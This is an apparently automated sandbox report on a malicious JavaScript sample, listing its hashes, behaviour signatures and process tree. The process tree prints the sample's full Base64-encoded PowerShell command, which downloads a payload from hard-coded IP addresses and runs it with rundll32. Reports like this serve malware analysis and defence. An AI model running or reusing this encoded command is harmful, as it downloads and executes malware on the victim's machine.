Analysis

  • max time kernel
    82s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    05/05/2023, 13:46

General

  • Target

    Vnakqhgg.js

  • Size

    51KB

  • MD5

    d0bf291627ee585bce6b79b0e02be8e7

  • SHA1

    952097b41357ee4e3aed74823a0d3c20bdd45191

  • SHA256

    8b20afb8cb70beeeca2edc91794c4065c7b553e17eb6218fcec246452facb208

  • SHA512

    38548e5ce504377fe0a42cfefdc034ce8299d46b4273478be06b67a0376917ed5dc2a7e94cbc62e3cdb37b871b3a7a0a3ba74641bb6e3f96d3a7082880dfc3ba

  • SSDEEP

    768:2ySwBrvGSnhvVUgUBjBLGSCOkhyDu7mSm/jAcTfGPF+82H0VtjJekxz664ahBKpv:2fwLx+ileEiZjClQ

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Vnakqhgg.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1536
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Vnakqhgg.js" levulosuria overmilitaristicallyTelluretted
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1260
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANwAyADsAJAByAGEAZgB0AGkAbgBnACAAPQAgACgAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQAyADEALgAxADYALgAyADMAMwAvAFgAVABMAFkAMQBYAFEALwBYAEwASgBYAGUAQwAwACwAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEAMgAxAC4AMQA2AC4AMgAzADIALwB3ADAARwAvAG4AZQA0AFYAZQBGAFQAeAB1AFEALABoAHQAdABwADoALwAvADEANQAxAC4AMgAzADYALgAxADQALgAxADIANwAvAEYAUQBvAEIAQgBRAC8AcQBuAEkAcABNADYAQwBaAEQAdQB2ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbgBzAGUAYwB0AGEAcgBpAHUAbQBzAFMAdAB1AG0AcABhAGcAZQBzACAAaQBuACAAJAByAGEAZgB0AGkAbgBnACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABJAG4AcwBlAGMAdABhAHIAaQB1AG0AcwBTAHQAdQBtAHAAYQBnAGUAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAYwBpAG4AZQBtAGEAdABvAGcAcgBhAHAAaAB5AEQAbwB3AHMAZQByAHMALgBVAG4AbwByAGQAYQBpAG4AZQBkAEQAZQBzAHMAdQBzADsAIABpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAXABjAGkAbgBlAG0AYQB0AG8AZwByAGEAcABoAHkARABvAHcAcwBlAHIAcwAuAFUAbgBvAHIAZABhAGkAbgBlAGQARABlAHMAcwB1AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYAOQAwADAAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAGoAQQBHAGsAQQBiAGcAQgBsAEEARwAwAEEAWQBRAEIAMABBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBjAEEAQgBvAEEASABrAEEAUgBBAEIAdgBBAEgAYwBBAGMAdwBCAGwAQQBIAEkAQQBjAHcAQQB1AEEARgBVAEEAYgBnAEIAdgBBAEgASQBBAFoAQQBCAGgAQQBHAGsAQQBiAGcAQgBsAEEARwBRAEEAUgBBAEIAbABBAEgATQBBAGMAdwBCADEAQQBIAE0AQQBMAEEAQgBVAEEARwBrAEEAYgBRAEIAbABBAEQAcwBBACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1680

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1680-58-0x000000001B3F0000-0x000000001B6D2000-memory.dmp

    Filesize

    2.9MB

  • memory/1680-59-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

  • memory/1680-60-0x0000000002690000-0x0000000002710000-memory.dmp

    Filesize

    512KB

  • memory/1680-61-0x0000000002690000-0x0000000002710000-memory.dmp

    Filesize

    512KB

  • memory/1680-62-0x0000000002690000-0x0000000002710000-memory.dmp

    Filesize

    512KB

  • memory/1680-63-0x0000000002690000-0x0000000002710000-memory.dmp

    Filesize

    512KB

  • memory/1680-64-0x0000000002690000-0x0000000002710000-memory.dmp

    Filesize

    512KB

  • memory/1680-65-0x0000000002690000-0x0000000002710000-memory.dmp

    Filesize

    512KB

  • memory/1680-66-0x0000000002690000-0x0000000002710000-memory.dmp

    Filesize

    512KB

  • memory/1680-67-0x0000000002690000-0x0000000002710000-memory.dmp

    Filesize

    512KB